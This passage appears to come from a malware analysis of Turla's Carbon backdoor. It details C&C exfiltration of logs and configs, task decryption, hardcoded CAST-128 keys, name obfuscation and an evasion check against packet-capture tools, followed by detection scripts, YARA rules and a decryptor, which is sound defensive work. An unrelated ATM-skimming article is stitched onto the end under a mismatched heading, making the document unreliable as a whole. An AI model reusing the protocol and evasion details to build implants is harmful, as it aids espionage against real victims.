If there is a value for the attribute “timestop” from the [TIME] section (which looks like “wDay:wMonth:wYear:wHour:wMinute”), the thread will execute the code only after this specific datetime.

The attributes “lastsend” and “logperiod” from the [LOG] section are used to specify a delay time when to backup and send the log to the C&C server. (by default: every two hours).

A temporary file with a random name prefixed by “~D” is created in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). The logfile content is copied into this new file. It is then compressed with Bzip2 and encrypted (CAST-128).

A new line is added at the end of the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “10|1|%s|%s”
    • 1st field: an ID to identify the file as a logfile
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp file path
    • 4th field: the victim uuid

Last but not least, the attribute “lastsend” is updated with the current time and the original logfile is deleted.

Communication with the C&C server

The code of this thread is used to retrieve new tasks from the C&C server, to send new files to the server (the files listed in the file “C_56743.NLS” / “dsntype.gif”) and to send the new tasks to the orchestrator.

First request

A random C&C server address is chosen from the ones in the section “CW_INET”. If the port and HTTP resource path are not specified, the default is to use port 80 and “/javascript/view.php”.

A user agent is set up in the following way:

  • the version of Internet Explorer is retrieved through the registry key: “HKLM\Software\Microsoft\Internet Explorer\Version” and is concatenated to the string “Mozilla/4.0 (compatible; MSIE %d.0; ”
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0;”
  • concatenate the previous string with the OS major/minor version values (through GetVersionExA())
    • “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0”
  • the values under the key “HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform” are enumerated; each value is concatenated to the previous string, and a closing parenthesis is appended.
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0; SLCC2)”

The field “trans_timemax” from the section [TIME] is retrieved. It is used to set the timeout for internet requests (through InternetSetOption()). It has a value of 10 minutes by default.

A first GET request is performed on the root page of the C&C web server to check that the host is alive. If no packet capture is running on the system, a new request is done on the C&C server to check if new tasks are available. A “PHPSESSID” cookie is added to the request with the victim uuid as its value. A header “Referer” is added as well and set to the C&C server URL.

The malware is expecting to get an answer to the GET request similar to:

  • <input name="%name%" value="%data_in_b64%">

If the field “value” contains something, a new task is available.

Send data to the server

If the file “C_56743.NLS” / “dsntype.gif” is not empty, there are data to be sent to the C&C server. The file is parsed and the last line is retrieved; it contains details about the data to be sent. A data blob is built and each of the following fields is encrypted with CAST-128:

  • id | val | tmp_filesize | tmp_content | [OPTIONAL (if val == 2) tmp2_filesize | tmp2_content] | len_object_id | object_id
    • id = the type of data to send to the C&C server, it can be:
      • 10: log backup
      • 11: configuration file
      • 20: a cryptographic key
      • otherwise: an id associated to a task, it can be the result of a task or an error log in the case of task execution failure
    • val = 1 if there is only one file to send, 2 if there are two files
    • object_id = the victim uuid

If the field “dtc” from the section [CRYPTO] of the configuration file is set to 0, this whole blob is base64 encoded and sent to the C&C server through a POST request.

Otherwise, another layer of encryption is used. In this case, the data blob is signed and a random 3DES key is used to encrypt it. Because the 3DES key is randomly generated and the server needs it to decrypt the data, the key is encrypted with the server public key. The server key is retrieved from the field “publicc” of the section [CRYPTO] from the configuration file.

This new blob (encrypted_key | signature_data | encrypted data) is encoded in base64 and sent to the C&C server through a POST request.

In order to avoid detection based on the data size sent in a request, the blob can be fragmented into several packets. An option in the configuration file (“post_frag” in the section [TRANSPORT]) defines whether the blob will be fragmented or sent in only one POST request.

If this option is set to “yes”, the blob is divided into several fragments of a specific size. This size comes from another field in the configuration file: “post_frag_size”.

An additional header will be added to the request:

  • “Content-Range: bytes %u-%u/%u; id=%u\r\n”, with the parameters i, i+(fragment_size-1), data_size, task_id

If the option http11 is set, a specific header is added as well:

  • “Expect: 100-continue\r\n”

For each fragment sent, the fields “post_frag_size” and “pfslastset” from the config file (section [CW_INET_RESULTS]) are updated with the fragment size and the timestamp.
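
Added example, not part of the original analysis: detection logic over constructed HTTP proxy events that flags the user-agent anomaly described under “First request” (the full IE build string followed by “.0”) and the fragmented-POST “Content-Range ... id=” header described just above. The event layout and the host names are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Carbon's user agent embeds the full IE build string read from the registry,
# followed by ".0" (e.g. "MSIE 8.0.6001.18702.0;"); a genuine IE user agent
# carries only the major.minor version ("MSIE 8.0;").
UA_FULL_BUILD_RE = re.compile(r"MSIE \d+\.\d+\.\d+\.\d+\.0;")
# Content-Range belongs in responses; Carbon puts it on fragmented POSTs with
# a non-standard "id=" parameter.
CONTENT_RANGE_ID_RE = re.compile(r"^bytes \d+-\d+/\d+; id=\d+$")
DEFAULT_CNC_PATH = "/javascript/view.php"
STRONG = {"ua_full_ie_build", "content_range_id"}

# Constructed proxy events; hosts are placeholders, not real C&C addresses.
CARBON_UA = ("Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; "
             "Trident/4.0; .NET CLR 2.0.50727; SLCC2)")
SAMPLE_EVENTS = [
    {"method": "GET", "host": "cnc.example.invalid", "path": DEFAULT_CNC_PATH,
     "user_agent": CARBON_UA,
     "headers": {"Cookie": "PHPSESSID=8hTdJtUBB57ieReZAOSgUYacts",
                 "Referer": "http://cnc.example.invalid/"}},
    {"method": "POST", "host": "cnc.example.invalid", "path": DEFAULT_CNC_PATH,
     "user_agent": CARBON_UA,
     "headers": {"Content-Range": "bytes 0-1023/4096; id=12",
                 "Expect": "100-continue"}},
    {"method": "GET", "host": "www.bing.com", "path": "/",
     "user_agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)",
     "headers": {}},
]


def score_event(event: Dict) -> List[str]:
    """Return the indicator names one HTTP event triggers (strong ones first)."""
    hits = []
    headers = {k.lower(): v for k, v in event.get("headers", {}).items()}
    is_post = event.get("method") == "POST"
    if UA_FULL_BUILD_RE.search(event.get("user_agent", "")):
        hits.append("ua_full_ie_build")
    if is_post and CONTENT_RANGE_ID_RE.match(headers.get("content-range", "")):
        hits.append("content_range_id")
    # weak indicators: plausible on their own, useful only beside a strong one
    if event.get("path") == DEFAULT_CNC_PATH:
        hits.append("default_cnc_path")
    if is_post and headers.get("expect", "").lower() == "100-continue":
        hits.append("expect_100_continue")
    return hits


def find_suspicious(events: List[Dict]) -> List[Tuple[int, List[str]]]:
    """Events worth an analyst's attention: at least one strong indicator."""
    flagged = []
    for idx, event in enumerate(events):
        hits = score_event(event)
        if STRONG & set(hits):
            flagged.append((idx, hits))
    return flagged
```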

Get new tasks

New tasks are retrieved from the C&C server by parsing the html page. The malware expects to find the html tag <input> in the page with a base64 encoded blob in its “value” attribute. Once decoded, this blob contains:

  • an encrypted block of 128 bytes that contains a structure “PUBLICKEYSTRUC” followed by a cryptographic key (probably a 3DES key)
  • signature data (128 bytes) to verify the integrity of the next block
  • a block of encrypted data that contains the task

The malware uses an RSA private key (retrieved from the field “keypair” from the section [CRYPTO] of the configuration file) to decrypt the first block and then uses the freshly decrypted key to decrypt the third block. This block of data can be either:

  • a task to be executed[6]
    • the data are decrypted and stored in a few temporary files: the task (a command or a PE file) and its configuration file in the “Nls” folder, and the output files (the file that will contain the task results, and the logfile) in the folder “0208” (respectively “0409” and “1033” for Carbon v3.8x)
    • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
    • this line is added to the beginning of the file “b9s3coff.ax” (cifrado.xml on v3.8x)
  • a task to be executed by the orchestrator[7]
    • the data are decrypted and stored in a few temporary files (the task, its configuration etc.) in the “Nls” and “0208” folders (or “0409” and “1033” for Carbon v3.8x)
    • depending on the content of the data, one of these lines is added to the beginning of the file “a67ncode.ax” (encodebase.info on v3.8x)
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode | username | password
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode
  • a new RSA server public key
    • in this case, the configuration file is updated with the new key encoded in base64 (field publicc)
  • data to be sent to an instance of Carbon running in another computer in the same network
    • the data can contain a specific IP address and port, a named pipe, or a named pipe with a username and password.

Check Internet availability

Each hour, the internet connection is checked. A first check is done by calling the function InternetAttemptConnect(). If it works, another test is done by sending HTTP GET requests to the following websites:

  • www.google.com
  • www.yahoo.com
  • www.bing.com
  • update.microsoft.com
  • windowsupdate.microsoft.com
  • microsoft.com

An event is used to notify the other threads in case of the loss of Internet access.

Configuration file backup

Similar to the logfile, the configuration file is also periodically backed up and sent to the C&C server. The thread executes the code in a specific range of time (between 8h and 20h by default)[8].

The value “configlastsend” is retrieved from the section [TIME] of the configuration file. If the configuration file was last sent more than a month ago, it is copied into a temporary file with a random name prefixed by “~D” in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). This file is then encrypted with the CAST-128 algorithm.

To notify the thread that communicates with the C&C server that a new file is ready to be sent to the server, the following line is appended to the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “11|1|%s|%s”
    • 1st field: an ID to identify the file as a config file
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp filepath
    • 4th field: the victim uuid

Last but not least, the attribute “configlastsend” is updated with the current time.

Additional Notes

Calling API functions

The base addresses of the modules of interest are retrieved either by parsing the PEB or (if the modules are not loaded into the process memory) by loading the needed files from disk into memory and parsing their headers to get their base addresses.

Once the base addresses are retrieved, the PEB is walked again and the field “LoadCount” from the structure LDR_DATA_TABLE_ENTRY is checked. This value is used as a reference counter, to track the loading and unloading of a module.

If “LoadCount” is positive, the module EAT is parsed to get the needed function address.

Encryption

The module and function names are encrypted (at least since v3.77; this was not the case in v3.71) in a simple way: a logical shift of 1 bit is applied to each character.

The process names are encrypted as well, by XOR’ing each character with the key 0x55 (for Carbon v3.7x, at least since v3.77) or with the key 0x77 (for Carbon v3.8x).

With only a few exceptions, each file in the Carbon working directory is encrypted with the CAST-128 algorithm in OFB mode. The same key and IV are used from version 3.71 until version 3.81:

  • key = "\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10"
  • IV = "\x12\x34\x56\x78\x9A\xBC\xDE\xF0"
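
An added example (not from the original analysis) that scans a memory region or an unpacked sample for strings obfuscated with the shift and XOR schemes described above, which is how an analyst recovers the module, function and process names without running the sample. The shift direction (stored byte = character shifted left by one bit, decoded by a logical right shift) is an assumption, since the text does not state it, and the sample blob is constructed.

```python
import re
from typing import Callable, List, Tuple

TOKEN_RE = re.compile(r"^[A-Za-z0-9_.\-]+$")   # module/API/process-name shape
MIN_LEN = 6


def decode_shift1(b: int) -> int:
    # Assumption: the stored byte is the character shifted left by one bit
    # (lossless for 7-bit ASCII), so decoding is a logical right shift.
    return b >> 1


DECODERS: List[Tuple[str, Callable[[int], int]]] = [
    ("shift1", decode_shift1),            # module and function names
    ("xor55", lambda b: b ^ 0x55),        # process names, Carbon v3.7x
    ("xor77", lambda b: b ^ 0x77),        # process names, Carbon v3.8x
]


def printable_runs(blob: bytes, decode: Callable[[int], int]) -> List[Tuple[int, str]]:
    """Decode byte by byte and collect runs of printable ASCII of MIN_LEN or
    more. A raw 0x00 always ends a run: under the shift it is a genuine NUL;
    under XOR it is the key's own character ('U' for 0x55, 'w' for 0x77), so
    a name containing that letter would be split, an acceptable trade-off
    for not gluing NUL padding onto the recovered strings."""
    runs, start, chars = [], None, []
    for i, raw in enumerate(blob + b"\x00"):   # sentinel flushes the last run
        d = decode(raw)
        if raw != 0 and 0x20 <= d < 0x7F:
            if start is None:
                start = i
            chars.append(chr(d))
            continue
        if start is not None and len(chars) >= MIN_LEN:
            runs.append((start, "".join(chars)))
        start, chars = None, []
    return runs


def looks_like_name(s: str) -> bool:
    """Windows module, API and process names contain lowercase letters and
    more than a couple of distinct characters; this drops the junk a wrong
    decoder produces (xor77 over xor55 data yields uppercase-only tokens,
    the shift over plain text yields digits and punctuation)."""
    return bool(TOKEN_RE.match(s)) and any(c.islower() for c in s) and len(set(s)) >= 3


def scan_obfuscated_strings(blob: bytes) -> List[Tuple[str, int, str]]:
    """(scheme, offset, decoded string) for every candidate under each scheme."""
    hits = []
    for name, decode in DECODERS:
        for offset, s in printable_runs(blob, decode):
            if looks_like_name(s):
                hits.append((name, offset, s))
    return hits


# --- constructed sample: plain text followed by one string per scheme ---
def _enc_shift(s: str) -> bytes:
    return bytes(ord(c) << 1 for c in s)


def _enc_xor(s: str, key: int) -> bytes:
    return bytes(ord(c) ^ key for c in s)


SAMPLE_BLOB = (
    b"This program cannot be run in DOS mode." + b"\x00" * 4
    + _enc_shift("LoadLibraryW") + b"\x00" * 4
    + _enc_xor("wireshark.exe", 0x55) + b"\x00" * 4
    + _enc_xor("tcpdump.exe", 0x77) + b"\x00" * 4
)
```

Every hit is a candidate for analyst review: the scheme names tell you which Carbon version's encoding produced it.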

Check if packet capture is running

Before communicating with the C&C server or with other computers, the malware ensures that none of the most common packet capture software is running on the system:

  • TCPdump.exe
  • windump.exe
  • ethereal.exe
  • wireshark.exe
  • ettercap.exe
  • snoop.exe
  • dsniff.exe

If any of these processes are running, no communication will be done.

Carbon IoCs are also available on ESET’s GitHub repository: https://github.com/eset/malware-ioc/tree/master/turla

Appendices

Yara rules

import "pe"

rule generic_carbon
{
    strings:
        $s1 = "ModStart"
        $s2 = "ModuleStart"
        $t1 = "STOP|OK"
        $t2 = "STOP|KILL"
    condition:
        (uint16(0) == 0x5a4d) and (1 of ($s*)) and (1 of ($t*))
}

rule carbon_metadata
{
    condition:
        (pe.version_info["InternalName"] contains "SERVICE.EXE" or
         pe.version_info["InternalName"] contains "MSIMGHLP.DLL" or
         pe.version_info["InternalName"] contains "MSXIML.DLL")
        and pe.version_info["CompanyName"] contains "Microsoft Corporation"
}

Carbon files decryptor/encryptor

carbon_tool.py

#!/usr/bin/env python2

from Crypto.Cipher import CAST
import sys
import argparse


def main():
    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("-e", "--encrypt", help="encrypt carbon file", required=False)
    parser.add_argument("-d", "--decrypt", help="decrypt carbon file", required=False)

    try:
        args = parser.parse_args()
    except IOError as e:
        parser.error(e)
        return 0

    # exactly one of -e/-d followed by its file argument is expected
    if len(sys.argv) != 3:
        parser.print_help()
        return 0

    # key and IV shared by Carbon 3.71 through 3.81 (CAST-128, OFB mode)
    key = "\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10"
    iv = "\x12\x34\x56\x78\x9A\xBC\xDE\xF0"

    cipher = CAST.new(key, CAST.MODE_OFB, iv)

    if args.encrypt:
        plaintext = open(args.encrypt, "rb").read()
        # pad to the 8-byte block size with NUL bytes
        while len(plaintext) % 8 != 0:
            plaintext += "\x00"
        data = cipher.encrypt(plaintext)
        open(args.encrypt + "_encrypted", "wb").write(data)
    else:
        ciphertext = open(args.decrypt, "rb").read()
        while len(ciphertext) % 8 != 0:
            ciphertext += "\x00"
        data = cipher.decrypt(ciphertext)
        open(args.decrypt + "_decrypted", "wb").write(data)


if __name__ == "__main__":
    main()

Open Source documentation

Carbon footprint

Table 2 – Carbon sample hashes
Table 3 – C&C server addresses (hacked websites used as 1st level of proxies)
Notes
5. two hours by default, but the waiting time depends on the value of the field “logperiod” from the “LOG” section of the configuration file
6. check the “Tasks execution” part for more details
7. check the “Orchestrator / Tasks execution” part for more details
8. depending on the config file; check “Log rotation” for the details

China Hacker Cloud shows you how ATM card-theft “drive-bys” are carried out.

If you have been keeping up with the topic: the FBI recently cracked down on an ATM card data theft ring in which the scammers fitted fake hardware to the front of ATMs and tricked users into entering their PIN, logging the data to a recording device that could be retrieved later. In some cases the attackers used Bluetooth to retrieve the information from a computer in a car parked near the ATM. A drive-by carried out with a variety of high-tech means: one bad guy has harvested more, and from a greater distance, than one with a mask and a gun, with no gun involved.

The process, known as ATM skimming, is certainly not a new concept (but as Randy Abrams points out, there are very few genuinely new scams; they usually reuse old ones in other places). For a long time, bank tellers and other public-facing staff have tried small frauds, pocketing a penny or a dollar. One would hope that this is enough for the system (or the boss) to notice, but the sums add up neatly over time. What has changed here is that technology lets the scammers do this essentially automatically, undetected and relatively anonymously once the device is in place.

Once they have the data on their laptops, they either take out cash directly by trying to imprint your information onto a fake card, or sell it in bulk on the black market to other scammers for a large sum.

ATMs come in different styles depending on model and manufacturer. This plays into the scam, because if a fake keypad is installed on top of the real keys to intercept keystrokes, people may not notice that something looks “out of place” on that model of ATM. Likewise, the card slot can be blocked with a custom-made plate and a fake reader installed above it to capture the card. The FBI has a good image (below) showing the subtle differences on a typical compromised ATM. Note the fake camera above the screen, the fake keypad overlay and the blocked card slot. The fakes are not bad and are easy to overlook, certainly if you are in a hurry.

Typical skimming techniques on an ATM (image courtesy of the U.S. FBI)

By the numbers: several cases have been busted by the FBI; in one example, a Bulgarian national was “sentenced yesterday to 21 months in prison for his role in a scheme that used sophisticated skimming devices on ATMs to steal $1.8 million from at least 1,400 customer accounts at banks in the New York area.”

They recommend that users inspect ATMs, gas pumps or credit card readers before using them, and be suspicious “if you see anything loose, crooked or damaged, or if you notice scratches or glue/tape residue”. Also, be on the lookout for tampered devices in tourist traps, a popular target, and use ATMs in indoor locations, where they are more easily monitored for tampering. They also say: “if your card is not returned after the transaction or after pressing cancel, immediately contact the financial institution that issued the card.” So be aware this summer when you are travelling: stolen financial information can be the least welcome surprise of your trip.